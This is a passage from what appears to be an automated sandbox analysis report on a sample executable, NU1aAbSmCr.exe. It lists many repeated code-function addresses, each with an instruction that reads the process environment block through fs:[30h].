            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016AA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01688350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0166035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0166035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015DC310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016B8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016B8324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0161A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01600310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015E83C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015EA3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016163FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0169C3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016663C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015FE3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0168E3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0168E3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015F03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016843D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015D8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE388 mov eax, dword ptr fs:[00000030h]4_2_015DE388
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE388 mov eax, dword ptr fs:[00000030h]4_2_015DE388
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE388 mov eax, dword ptr fs:[00000030h]4_2_015DE388
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160438F mov eax, dword ptr fs:[00000030h]4_2_0160438F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160438F mov eax, dword ptr fs:[00000030h]4_2_0160438F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E6259 mov eax, dword ptr fs:[00000030h]4_2_015E6259
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DA250 mov eax, dword ptr fs:[00000030h]4_2_015DA250
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01690274 mov eax, dword ptr fs:[00000030h]4_2_01690274
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01668243 mov eax, dword ptr fs:[00000030h]4_2_01668243
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01668243 mov ecx, dword ptr fs:[00000030h]4_2_01668243
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D826B mov eax, dword ptr fs:[00000030h]4_2_015D826B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B625D mov eax, dword ptr fs:[00000030h]4_2_016B625D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A250 mov eax, dword ptr fs:[00000030h]4_2_0169A250
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A250 mov eax, dword ptr fs:[00000030h]4_2_0169A250
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4260 mov eax, dword ptr fs:[00000030h]4_2_015E4260
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4260 mov eax, dword ptr fs:[00000030h]4_2_015E4260
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4260 mov eax, dword ptr fs:[00000030h]4_2_015E4260
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D823B mov eax, dword ptr fs:[00000030h]4_2_015D823B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EA2C3 mov eax, dword ptr fs:[00000030h]4_2_015EA2C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B62D6 mov eax, dword ptr fs:[00000030h]4_2_016B62D6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02E1 mov eax, dword ptr fs:[00000030h]4_2_015F02E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02E1 mov eax, dword ptr fs:[00000030h]4_2_015F02E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02E1 mov eax, dword ptr fs:[00000030h]4_2_015F02E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov ecx, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016762A0 mov eax, dword ptr fs:[00000030h]4_2_016762A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01660283 mov eax, dword ptr fs:[00000030h]4_2_01660283
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01660283 mov eax, dword ptr fs:[00000030h]4_2_01660283
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01660283 mov eax, dword ptr fs:[00000030h]4_2_01660283
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E284 mov eax, dword ptr fs:[00000030h]4_2_0161E284
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E284 mov eax, dword ptr fs:[00000030h]4_2_0161E284
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02A0 mov eax, dword ptr fs:[00000030h]4_2_015F02A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F02A0 mov eax, dword ptr fs:[00000030h]4_2_015F02A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161656A mov eax, dword ptr fs:[00000030h]4_2_0161656A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161656A mov eax, dword ptr fs:[00000030h]4_2_0161656A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161656A mov eax, dword ptr fs:[00000030h]4_2_0161656A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8550 mov eax, dword ptr fs:[00000030h]4_2_015E8550
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8550 mov eax, dword ptr fs:[00000030h]4_2_015E8550
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E53E mov eax, dword ptr fs:[00000030h]4_2_0160E53E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01676500 mov eax, dword ptr fs:[00000030h]4_2_01676500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0535 mov eax, dword ptr fs:[00000030h]4_2_015F0535
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016B4500 mov eax, dword ptr fs:[00000030h]4_2_016B4500
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160E5E7 mov eax, dword ptr fs:[00000030h]4_2_0160E5E7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C5ED mov eax, dword ptr fs:[00000030h]4_2_0161C5ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C5ED mov eax, dword ptr fs:[00000030h]4_2_0161C5ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E65D0 mov eax, dword ptr fs:[00000030h]4_2_015E65D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E5CF mov eax, dword ptr fs:[00000030h]4_2_0161E5CF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E5CF mov eax, dword ptr fs:[00000030h]4_2_0161E5CF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A5D0 mov eax, dword ptr fs:[00000030h]4_2_0161A5D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A5D0 mov eax, dword ptr fs:[00000030h]4_2_0161A5D0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E25E0 mov eax, dword ptr fs:[00000030h]4_2_015E25E0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016605A7 mov eax, dword ptr fs:[00000030h]4_2_016605A7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016605A7 mov eax, dword ptr fs:[00000030h]4_2_016605A7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016605A7 mov eax, dword ptr fs:[00000030h]4_2_016605A7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016045B1 mov eax, dword ptr fs:[00000030h]4_2_016045B1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016045B1 mov eax, dword ptr fs:[00000030h]4_2_016045B1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E2582 mov eax, dword ptr fs:[00000030h]4_2_015E2582
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E2582 mov ecx, dword ptr fs:[00000030h]4_2_015E2582
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01614588 mov eax, dword ptr fs:[00000030h]4_2_01614588
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E59C mov eax, dword ptr fs:[00000030h]4_2_0161E59C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015D645D mov eax, dword ptr fs:[00000030h]4_2_015D645D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166C460 mov ecx, dword ptr fs:[00000030h]4_2_0166C460
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160A470 mov eax, dword ptr fs:[00000030h]4_2_0160A470
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160A470 mov eax, dword ptr fs:[00000030h]4_2_0160A470
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160A470 mov eax, dword ptr fs:[00000030h]4_2_0160A470
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161E443 mov eax, dword ptr fs:[00000030h]4_2_0161E443
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0160245A mov eax, dword ptr fs:[00000030h]4_2_0160245A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A456 mov eax, dword ptr fs:[00000030h]4_2_0169A456
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01666420 mov eax, dword ptr fs:[00000030h]4_2_01666420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A430 mov eax, dword ptr fs:[00000030h]4_2_0161A430
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618402 mov eax, dword ptr fs:[00000030h]4_2_01618402
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618402 mov eax, dword ptr fs:[00000030h]4_2_01618402
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618402 mov eax, dword ptr fs:[00000030h]4_2_01618402
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DC427 mov eax, dword ptr fs:[00000030h]4_2_015DC427
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE420 mov eax, dword ptr fs:[00000030h]4_2_015DE420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE420 mov eax, dword ptr fs:[00000030h]4_2_015DE420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015DE420 mov eax, dword ptr fs:[00000030h]4_2_015DE420
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E04E5 mov ecx, dword ptr fs:[00000030h]4_2_015E04E5
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016144B0 mov ecx, dword ptr fs:[00000030h]4_2_016144B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166A4B0 mov eax, dword ptr fs:[00000030h]4_2_0166A4B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0169A49A mov eax, dword ptr fs:[00000030h]4_2_0169A49A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E64AB mov eax, dword ptr fs:[00000030h]4_2_015E64AB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0750 mov eax, dword ptr fs:[00000030h]4_2_015E0750
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161674D mov esi, dword ptr fs:[00000030h]4_2_0161674D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161674D mov eax, dword ptr fs:[00000030h]4_2_0161674D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161674D mov eax, dword ptr fs:[00000030h]4_2_0161674D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E8770 mov eax, dword ptr fs:[00000030h]4_2_015E8770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F0770 mov eax, dword ptr fs:[00000030h]4_2_015F0770
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622750 mov eax, dword ptr fs:[00000030h]4_2_01622750
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622750 mov eax, dword ptr fs:[00000030h]4_2_01622750
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01664755 mov eax, dword ptr fs:[00000030h]4_2_01664755
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166E75D mov eax, dword ptr fs:[00000030h]4_2_0166E75D
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C720 mov eax, dword ptr fs:[00000030h]4_2_0161C720
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C720 mov eax, dword ptr fs:[00000030h]4_2_0161C720
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E0710 mov eax, dword ptr fs:[00000030h]4_2_015E0710
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165C730 mov eax, dword ptr fs:[00000030h]4_2_0165C730
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161273C mov eax, dword ptr fs:[00000030h]4_2_0161273C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161273C mov ecx, dword ptr fs:[00000030h]4_2_0161273C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161273C mov eax, dword ptr fs:[00000030h]4_2_0161273C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C700 mov eax, dword ptr fs:[00000030h]4_2_0161C700
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01610710 mov eax, dword ptr fs:[00000030h]4_2_01610710
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0166E7E1 mov eax, dword ptr fs:[00000030h]4_2_0166E7E1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016027ED mov eax, dword ptr fs:[00000030h]4_2_016027ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016027ED mov eax, dword ptr fs:[00000030h]4_2_016027ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016027ED mov eax, dword ptr fs:[00000030h]4_2_016027ED
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015EC7C0 mov eax, dword ptr fs:[00000030h]4_2_015EC7C0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E47FB mov eax, dword ptr fs:[00000030h]4_2_015E47FB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E47FB mov eax, dword ptr fs:[00000030h]4_2_015E47FB
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016607C3 mov eax, dword ptr fs:[00000030h]4_2_016607C3
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016947A0 mov eax, dword ptr fs:[00000030h]4_2_016947A0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0168678E mov eax, dword ptr fs:[00000030h]4_2_0168678E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E07AF mov eax, dword ptr fs:[00000030h]4_2_015E07AF
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A660 mov eax, dword ptr fs:[00000030h]4_2_0161A660
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A660 mov eax, dword ptr fs:[00000030h]4_2_0161A660
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A866E mov eax, dword ptr fs:[00000030h]4_2_016A866E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016A866E mov eax, dword ptr fs:[00000030h]4_2_016A866E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01612674 mov eax, dword ptr fs:[00000030h]4_2_01612674
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FC640 mov eax, dword ptr fs:[00000030h]4_2_015FC640
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01616620 mov eax, dword ptr fs:[00000030h]4_2_01616620
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01618620 mov eax, dword ptr fs:[00000030h]4_2_01618620
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
